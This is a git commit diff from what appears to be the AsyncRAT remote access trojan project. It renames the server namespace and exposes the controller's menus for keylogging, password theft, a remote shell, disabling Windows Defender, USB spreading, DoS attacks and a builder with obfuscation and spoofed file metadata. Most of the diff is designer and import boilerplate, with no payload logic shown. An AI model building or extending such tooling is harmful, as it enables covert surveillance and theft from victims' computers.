Rename the server project

This commit is contained in:
NYAN CAT 2019-06-13 15:28:20 +03:00
parent f8ee3c0f5f
commit 15d3d2d07e
158 changed files with 911 additions and 911 deletions

View File

@ -1,9 +1,9 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.168
# Visual Studio Version 16
VisualStudioVersion = 16.0.29009.5
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AsyncRAT-Sharp", "AsyncRAT-Sharp\AsyncRAT-Sharp.csproj", "{7767C300-5FD5-4A5D-9D4C-59559CCE48A3}"
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Server", "Server\Server.csproj", "{7767C300-5FD5-4A5D-9D4C-59559CCE48A3}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Client", "Client\Client.csproj", "{C3C49F45-2589-4E04-9C50-71B6035C14AE}"
EndProject

View File

@ -7,7 +7,7 @@ using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
namespace AsyncRAT_Sharp.Cryptography
namespace Server.Cryptography
{
public class Aes256
{

View File

@ -1,7 +1,7 @@
using System.Security.Cryptography;
using System.Text;
namespace AsyncRAT_Sharp.Cryptography
namespace Server.Cryptography
{
public static class Sha256
{

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp
namespace Server
{
partial class Form1
{
@ -223,7 +223,7 @@
//
// aBOUTToolStripMenuItem
//
this.aBOUTToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.info;
this.aBOUTToolStripMenuItem.Image = global::Server.Properties.Resources.info;
this.aBOUTToolStripMenuItem.Name = "aBOUTToolStripMenuItem";
this.aBOUTToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
this.aBOUTToolStripMenuItem.Text = "ABOUT";
@ -239,7 +239,7 @@
this.sENDFILEToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.tOMEMORYToolStripMenuItem,
this.tODISKToolStripMenuItem});
this.sENDFILEToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.tomem;
this.sENDFILEToolStripMenuItem.Image = global::Server.Properties.Resources.tomem;
this.sENDFILEToolStripMenuItem.Name = "sENDFILEToolStripMenuItem";
this.sENDFILEToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
this.sENDFILEToolStripMenuItem.Text = "Send File";
@ -267,14 +267,14 @@
this.fileManagerToolStripMenuItem1,
this.processManagerToolStripMenuItem1,
this.reportWindowToolStripMenuItem});
this.monitoringToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.monitoring_system;
this.monitoringToolStripMenuItem.Image = global::Server.Properties.Resources.monitoring_system;
this.monitoringToolStripMenuItem.Name = "monitoringToolStripMenuItem";
this.monitoringToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
this.monitoringToolStripMenuItem.Text = "Monitoring";
//
// remoteDesktopToolStripMenuItem1
//
this.remoteDesktopToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.remotedesktop;
this.remoteDesktopToolStripMenuItem1.Image = global::Server.Properties.Resources.remotedesktop;
this.remoteDesktopToolStripMenuItem1.Name = "remoteDesktopToolStripMenuItem1";
this.remoteDesktopToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.remoteDesktopToolStripMenuItem1.Text = "Remote Desktop";
@ -282,7 +282,7 @@
//
// keyloggerToolStripMenuItem1
//
this.keyloggerToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.logger;
this.keyloggerToolStripMenuItem1.Image = global::Server.Properties.Resources.logger;
this.keyloggerToolStripMenuItem1.Name = "keyloggerToolStripMenuItem1";
this.keyloggerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.keyloggerToolStripMenuItem1.Text = "Keylogger";
@ -290,7 +290,7 @@
//
// passwordRecoveryToolStripMenuItem1
//
this.passwordRecoveryToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.key;
this.passwordRecoveryToolStripMenuItem1.Image = global::Server.Properties.Resources.key;
this.passwordRecoveryToolStripMenuItem1.Name = "passwordRecoveryToolStripMenuItem1";
this.passwordRecoveryToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.passwordRecoveryToolStripMenuItem1.Text = "Password Recovery";
@ -298,7 +298,7 @@
//
// fileManagerToolStripMenuItem1
//
this.fileManagerToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.filemanager;
this.fileManagerToolStripMenuItem1.Image = global::Server.Properties.Resources.filemanager;
this.fileManagerToolStripMenuItem1.Name = "fileManagerToolStripMenuItem1";
this.fileManagerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.fileManagerToolStripMenuItem1.Text = "File Manager";
@ -306,7 +306,7 @@
//
// processManagerToolStripMenuItem1
//
this.processManagerToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.process;
this.processManagerToolStripMenuItem1.Image = global::Server.Properties.Resources.process;
this.processManagerToolStripMenuItem1.Name = "processManagerToolStripMenuItem1";
this.processManagerToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.processManagerToolStripMenuItem1.Text = "Process Manager";
@ -317,7 +317,7 @@
this.reportWindowToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.runToolStripMenuItem1,
this.stopToolStripMenuItem2});
this.reportWindowToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.report;
this.reportWindowToolStripMenuItem.Image = global::Server.Properties.Resources.report;
this.reportWindowToolStripMenuItem.Name = "reportWindowToolStripMenuItem";
this.reportWindowToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.reportWindowToolStripMenuItem.Text = "Report Window";
@ -347,14 +347,14 @@
this.remoteShellToolStripMenuItem1,
this.dOSAttackToolStripMenuItem,
this.executeNETCodeToolStripMenuItem});
this.miscellaneousToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.Miscellaneous;
this.miscellaneousToolStripMenuItem.Image = global::Server.Properties.Resources.Miscellaneous;
this.miscellaneousToolStripMenuItem.Name = "miscellaneousToolStripMenuItem";
this.miscellaneousToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
this.miscellaneousToolStripMenuItem.Text = "Miscellaneous";
//
// getAdminPrivilegesToolStripMenuItem
//
this.getAdminPrivilegesToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.uac;
this.getAdminPrivilegesToolStripMenuItem.Image = global::Server.Properties.Resources.uac;
this.getAdminPrivilegesToolStripMenuItem.Name = "getAdminPrivilegesToolStripMenuItem";
this.getAdminPrivilegesToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
this.getAdminPrivilegesToolStripMenuItem.Text = "Get Admin Privileges";
@ -362,7 +362,7 @@
//
// disableWindowsDefenderToolStripMenuItem
//
this.disableWindowsDefenderToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.disabled;
this.disableWindowsDefenderToolStripMenuItem.Image = global::Server.Properties.Resources.disabled;
this.disableWindowsDefenderToolStripMenuItem.Name = "disableWindowsDefenderToolStripMenuItem";
this.disableWindowsDefenderToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
this.disableWindowsDefenderToolStripMenuItem.Text = "Disable Windows Defender";
@ -370,7 +370,7 @@
//
// botsKillerToolStripMenuItem
//
this.botsKillerToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.botkiller;
this.botsKillerToolStripMenuItem.Image = global::Server.Properties.Resources.botkiller;
this.botsKillerToolStripMenuItem.Name = "botsKillerToolStripMenuItem";
this.botsKillerToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
this.botsKillerToolStripMenuItem.Text = "Bots Killer";
@ -378,7 +378,7 @@
//
// uSBSpreadToolStripMenuItem1
//
this.uSBSpreadToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.usb;
this.uSBSpreadToolStripMenuItem1.Image = global::Server.Properties.Resources.usb;
this.uSBSpreadToolStripMenuItem1.Name = "uSBSpreadToolStripMenuItem1";
this.uSBSpreadToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
this.uSBSpreadToolStripMenuItem1.Text = "USB Spread";
@ -386,7 +386,7 @@
//
// seedTorrentToolStripMenuItem1
//
this.seedTorrentToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.u_torrent_logo;
this.seedTorrentToolStripMenuItem1.Image = global::Server.Properties.Resources.u_torrent_logo;
this.seedTorrentToolStripMenuItem1.Name = "seedTorrentToolStripMenuItem1";
this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
this.seedTorrentToolStripMenuItem1.Text = "Seed Torrent";
@ -394,7 +394,7 @@
//
// remoteShellToolStripMenuItem1
//
this.remoteShellToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.shell;
this.remoteShellToolStripMenuItem1.Image = global::Server.Properties.Resources.shell;
this.remoteShellToolStripMenuItem1.Name = "remoteShellToolStripMenuItem1";
this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
this.remoteShellToolStripMenuItem1.Text = "Remote Shell";
@ -402,7 +402,7 @@
//
// dOSAttackToolStripMenuItem
//
this.dOSAttackToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos;
this.dOSAttackToolStripMenuItem.Image = global::Server.Properties.Resources.ddos;
this.dOSAttackToolStripMenuItem.Name = "dOSAttackToolStripMenuItem";
this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
this.dOSAttackToolStripMenuItem.Text = "DOS Attack";
@ -410,7 +410,7 @@
//
// executeNETCodeToolStripMenuItem
//
this.executeNETCodeToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.coding;
this.executeNETCodeToolStripMenuItem.Image = global::Server.Properties.Resources.coding;
this.executeNETCodeToolStripMenuItem.Name = "executeNETCodeToolStripMenuItem";
this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
this.executeNETCodeToolStripMenuItem.Text = "Execute .NET Code";
@ -422,14 +422,14 @@
this.visitWebsiteToolStripMenuItem1,
this.sendMessageBoxToolStripMenuItem1,
this.chatToolStripMenuItem1});
this.extraToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.extra;
this.extraToolStripMenuItem.Image = global::Server.Properties.Resources.extra;
this.extraToolStripMenuItem.Name = "extraToolStripMenuItem";
this.extraToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
this.extraToolStripMenuItem.Text = "Extra";
//
// visitWebsiteToolStripMenuItem1
//
this.visitWebsiteToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.visit;
this.visitWebsiteToolStripMenuItem1.Image = global::Server.Properties.Resources.visit;
this.visitWebsiteToolStripMenuItem1.Name = "visitWebsiteToolStripMenuItem1";
this.visitWebsiteToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.visitWebsiteToolStripMenuItem1.Text = "Visit Website";
@ -437,7 +437,7 @@
//
// sendMessageBoxToolStripMenuItem1
//
this.sendMessageBoxToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.msgbox;
this.sendMessageBoxToolStripMenuItem1.Image = global::Server.Properties.Resources.msgbox;
this.sendMessageBoxToolStripMenuItem1.Name = "sendMessageBoxToolStripMenuItem1";
this.sendMessageBoxToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.sendMessageBoxToolStripMenuItem1.Text = "Send MessageBox";
@ -445,7 +445,7 @@
//
// chatToolStripMenuItem1
//
this.chatToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.chat;
this.chatToolStripMenuItem1.Image = global::Server.Properties.Resources.chat;
this.chatToolStripMenuItem1.Name = "chatToolStripMenuItem1";
this.chatToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.chatToolStripMenuItem1.Text = "Chat";
@ -456,7 +456,7 @@
this.systemToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.clientToolStripMenuItem,
this.pCToolStripMenuItem});
this.systemToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.system;
this.systemToolStripMenuItem.Image = global::Server.Properties.Resources.system;
this.systemToolStripMenuItem.Name = "systemToolStripMenuItem";
this.systemToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
this.systemToolStripMenuItem.Text = "System";
@ -470,7 +470,7 @@
this.uninstallToolStripMenuItem,
this.toolStripSeparator3,
this.showFolderToolStripMenuItem});
this.clientToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.client;
this.clientToolStripMenuItem.Image = global::Server.Properties.Resources.client;
this.clientToolStripMenuItem.Name = "clientToolStripMenuItem";
this.clientToolStripMenuItem.Size = new System.Drawing.Size(158, 34);
this.clientToolStripMenuItem.Text = "Client";
@ -521,7 +521,7 @@
this.logoffToolStripMenuItem1,
this.restartToolStripMenuItem3,
this.shutdownToolStripMenuItem1});
this.pCToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.pc;
this.pCToolStripMenuItem.Image = global::Server.Properties.Resources.pc;
this.pCToolStripMenuItem.Name = "pCToolStripMenuItem";
this.pCToolStripMenuItem.Size = new System.Drawing.Size(158, 34);
this.pCToolStripMenuItem.Text = "PC";
@ -554,7 +554,7 @@
//
// bUILDERToolStripMenuItem
//
this.bUILDERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.builder;
this.bUILDERToolStripMenuItem.Image = global::Server.Properties.Resources.builder;
this.bUILDERToolStripMenuItem.Name = "bUILDERToolStripMenuItem";
this.bUILDERToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
this.bUILDERToolStripMenuItem.Text = "BUILDER";
@ -711,7 +711,7 @@
//
// sTARTToolStripMenuItem
//
this.sTARTToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.play_button;
this.sTARTToolStripMenuItem.Image = global::Server.Properties.Resources.play_button;
this.sTARTToolStripMenuItem.Name = "sTARTToolStripMenuItem";
this.sTARTToolStripMenuItem.Size = new System.Drawing.Size(139, 32);
this.sTARTToolStripMenuItem.Text = "START";
@ -719,7 +719,7 @@
//
// sTOPToolStripMenuItem
//
this.sTOPToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.stop__1_;
this.sTOPToolStripMenuItem.Image = global::Server.Properties.Resources.stop__1_;
this.sTOPToolStripMenuItem.Name = "sTOPToolStripMenuItem";
this.sTOPToolStripMenuItem.Size = new System.Drawing.Size(139, 32);
this.sTOPToolStripMenuItem.Text = "STOP";

View File

@ -1,19 +1,19 @@
using System;
using System.Windows.Forms;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.MessagePack;
using Server.Sockets;
using System.Threading.Tasks;
using Microsoft.VisualBasic;
using System.Linq;
using System.Threading;
using System.Drawing;
using System.IO;
using AsyncRAT_Sharp.Forms;
using AsyncRAT_Sharp.Cryptography;
using Server.Forms;
using Server.Cryptography;
using System.Diagnostics;
using System.Net.Sockets;
using AsyncRAT_Sharp.Handle_Packet;
using AsyncRAT_Sharp.Helper;
using Server.Handle_Packet;
using Server.Helper;
using System.Security.Cryptography.X509Certificates;
using System.Collections.Generic;
@ -25,7 +25,7 @@ using System.Collections.Generic;
This program Is distributed for educational purposes only.
*/
namespace AsyncRAT_Sharp
namespace Server
{
public partial class Form1 : Form

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
partial class FormAbout
{

View File

@ -8,7 +8,7 @@ using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormAbout : Form
{

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
partial class FormBuilder
{
@ -220,13 +220,13 @@ namespace AsyncRAT_Sharp.Forms
//
// txtPastebin
//
this.txtPastebin.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Pastebin", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtPastebin.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "Pastebin", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtPastebin.Enabled = false;
this.txtPastebin.Location = new System.Drawing.Point(106, 352);
this.txtPastebin.Name = "txtPastebin";
this.txtPastebin.Size = new System.Drawing.Size(271, 26);
this.txtPastebin.TabIndex = 8;
this.txtPastebin.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.Pastebin;
this.txtPastebin.Text = global::Server.Properties.Settings.Default.Pastebin;
this.toolTip1.SetToolTip(this.txtPastebin, "IP:PORT .. Example 127.0.0.1:6606");
//
// label6
@ -294,13 +294,13 @@ namespace AsyncRAT_Sharp.Forms
//
// textFilename
//
this.textFilename.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Filename", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.textFilename.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "Filename", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.textFilename.Enabled = false;
this.textFilename.Location = new System.Drawing.Point(103, 92);
this.textFilename.Name = "textFilename";
this.textFilename.Size = new System.Drawing.Size(271, 26);
this.textFilename.TabIndex = 5;
this.textFilename.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.Filename;
this.textFilename.Text = global::Server.Properties.Settings.Default.Filename;
//
// label3
//
@ -336,7 +336,7 @@ namespace AsyncRAT_Sharp.Forms
//
// pictureBox1
//
this.pictureBox1.Image = global::AsyncRAT_Sharp.Properties.Resources.uac;
this.pictureBox1.Image = global::Server.Properties.Resources.uac;
this.pictureBox1.Location = new System.Drawing.Point(175, 72);
this.pictureBox1.Name = "pictureBox1";
this.pictureBox1.Size = new System.Drawing.Size(32, 32);
@ -356,12 +356,12 @@ namespace AsyncRAT_Sharp.Forms
//
// txtMutex
//
this.txtMutex.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Mutex", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtMutex.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "Mutex", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtMutex.Location = new System.Drawing.Point(106, 165);
this.txtMutex.Name = "txtMutex";
this.txtMutex.Size = new System.Drawing.Size(271, 26);
this.txtMutex.TabIndex = 11;
this.txtMutex.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.Mutex;
this.txtMutex.Text = global::Server.Properties.Settings.Default.Mutex;
//
// label5
//
@ -482,63 +482,63 @@ namespace AsyncRAT_Sharp.Forms
//
// txtFileVersion
//
this.txtFileVersion.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtFileVersion", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtFileVersion.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtFileVersion", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtFileVersion.Enabled = false;
this.txtFileVersion.Location = new System.Drawing.Point(159, 368);
this.txtFileVersion.Name = "txtFileVersion";
this.txtFileVersion.Size = new System.Drawing.Size(337, 26);
this.txtFileVersion.TabIndex = 19;
this.txtFileVersion.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtFileVersion;
this.txtFileVersion.Text = global::Server.Properties.Settings.Default.txtFileVersion;
//
// txtProductVersion
//
this.txtProductVersion.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtProductVersion", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtProductVersion.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtProductVersion", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtProductVersion.Enabled = false;
this.txtProductVersion.Location = new System.Drawing.Point(159, 325);
this.txtProductVersion.Name = "txtProductVersion";
this.txtProductVersion.Size = new System.Drawing.Size(337, 26);
this.txtProductVersion.TabIndex = 18;
this.txtProductVersion.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtProductVersion;
this.txtProductVersion.Text = global::Server.Properties.Settings.Default.txtProductVersion;
//
// txtOriginalFilename
//
this.txtOriginalFilename.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtOriginalFilename", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtOriginalFilename.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtOriginalFilename", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtOriginalFilename.Enabled = false;
this.txtOriginalFilename.Location = new System.Drawing.Point(159, 280);
this.txtOriginalFilename.Name = "txtOriginalFilename";
this.txtOriginalFilename.Size = new System.Drawing.Size(337, 26);
this.txtOriginalFilename.TabIndex = 17;
this.txtOriginalFilename.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtOriginalFilename;
this.txtOriginalFilename.Text = global::Server.Properties.Settings.Default.txtOriginalFilename;
//
// txtTrademarks
//
this.txtTrademarks.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtTrademarks", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtTrademarks.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtTrademarks", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtTrademarks.Enabled = false;
this.txtTrademarks.Location = new System.Drawing.Point(159, 237);
this.txtTrademarks.Name = "txtTrademarks";
this.txtTrademarks.Size = new System.Drawing.Size(337, 26);
this.txtTrademarks.TabIndex = 16;
this.txtTrademarks.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtTrademarks;
this.txtTrademarks.Text = global::Server.Properties.Settings.Default.txtTrademarks;
//
// txtCopyright
//
this.txtCopyright.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtCopyright", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtCopyright.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtCopyright", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtCopyright.Enabled = false;
this.txtCopyright.Location = new System.Drawing.Point(159, 198);
this.txtCopyright.Name = "txtCopyright";
this.txtCopyright.Size = new System.Drawing.Size(337, 26);
this.txtCopyright.TabIndex = 15;
this.txtCopyright.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtCopyright;
this.txtCopyright.Text = global::Server.Properties.Settings.Default.txtCopyright;
//
// txtCompany
//
this.txtCompany.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtCompany", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtCompany.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtCompany", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtCompany.Enabled = false;
this.txtCompany.Location = new System.Drawing.Point(159, 155);
this.txtCompany.Name = "txtCompany";
this.txtCompany.Size = new System.Drawing.Size(337, 26);
this.txtCompany.TabIndex = 14;
this.txtCompany.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtCompany;
this.txtCompany.Text = global::Server.Properties.Settings.Default.txtCompany;
//
// label14
//
@ -596,13 +596,13 @@ namespace AsyncRAT_Sharp.Forms
//
// txtDescription
//
this.txtDescription.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtDescription", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtDescription.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtDescription", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtDescription.Enabled = false;
this.txtDescription.Location = new System.Drawing.Point(159, 112);
this.txtDescription.Name = "txtDescription";
this.txtDescription.Size = new System.Drawing.Size(337, 26);
this.txtDescription.TabIndex = 7;
this.txtDescription.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtDescription;
this.txtDescription.Text = global::Server.Properties.Settings.Default.txtDescription;
//
// label7
//
@ -615,13 +615,13 @@ namespace AsyncRAT_Sharp.Forms
//
// txtProduct
//
this.txtProduct.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "ProductName", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtProduct.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "ProductName", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
this.txtProduct.Enabled = false;
this.txtProduct.Location = new System.Drawing.Point(159, 69);
this.txtProduct.Name = "txtProduct";
this.txtProduct.Size = new System.Drawing.Size(337, 26);
this.txtProduct.TabIndex = 5;
this.txtProduct.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.ProductName;
this.txtProduct.Text = global::Server.Properties.Settings.Default.ProductName;
//
// label8
//

View File

@ -1,9 +1,9 @@
using System;
using System.Windows.Forms;
using AsyncRAT_Sharp.Helper;
using Server.Helper;
using System.Text;
using System.Security.Cryptography;
using AsyncRAT_Sharp.Cryptography;
using Server.Cryptography;
using System.Security.Cryptography.X509Certificates;
using System.Collections.Generic;
using Vestris.ResourceLib;
@ -11,9 +11,9 @@ using dnlib.DotNet;
using System.IO;
using System.Linq;
using dnlib.DotNet.Emit;
using AsyncRAT_Sharp.RenamingObfuscation;
using Server.RenamingObfuscation;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormBuilder : Form
{

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
partial class FormCertificate
{

View File

@ -5,7 +5,7 @@ using System.Security.Cryptography.X509Certificates;
using System.IO;
using System.IO.Compression;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormCertificate : Form
{

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
partial class FormChat
{

View File

@ -1,5 +1,5 @@
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.MessagePack;
using Server.Sockets;
using Microsoft.VisualBasic;
using System;
using System.Collections.Generic;
@ -12,7 +12,7 @@ using System.Threading.Tasks;
using System.Windows.Forms;
using System.Threading;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormChat : Form
{

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
partial class FormDOS
{

View File

@ -1,5 +1,5 @@
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.MessagePack;
using Server.Sockets;
using System;
using System.Collections.Generic;
using System.ComponentModel;
@ -13,7 +13,7 @@ using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormDOS : Form
{

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
partial class FormDotNetEditor
{

View File

@ -10,13 +10,13 @@ using System.Text;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.MessagePack;
using Server.Sockets;
using FastColoredTextBoxNS;
using Microsoft.CSharp;
using Microsoft.VisualBasic;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormDotNetEditor : Form
{

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
partial class FormDownloadFile
{

View File

@ -1,4 +1,4 @@
using AsyncRAT_Sharp.Sockets;
using Server.Sockets;
using System;
using System.Collections.Generic;
using System.ComponentModel;
@ -12,9 +12,9 @@ using System.Threading;
using System.IO;
using System.Net.Sockets;
using Timer = System.Threading.Timer;
using AsyncRAT_Sharp.Helper;
using Server.Helper;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormDownloadFile : Form
{

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
partial class FormFileManager
{

View File

@ -1,11 +1,11 @@
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.MessagePack;
using Server.Sockets;
using System;
using System.Windows.Forms;
using System.Threading;
using System.IO;
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
public partial class FormFileManager : Form
{

View File

@ -1,4 +1,4 @@
namespace AsyncRAT_Sharp.Forms
namespace Server.Forms
{
partial class FormKeylogger
{

View File

@ -1,5 +1,5 @@
using AsyncRAT_Sharp.MessagePack;
using AsyncRAT_Sharp.Sockets;
using Server.MessagePack;
using Server.Sockets;
using System;
using System.Collections.Generic;
using System.ComponentModel;
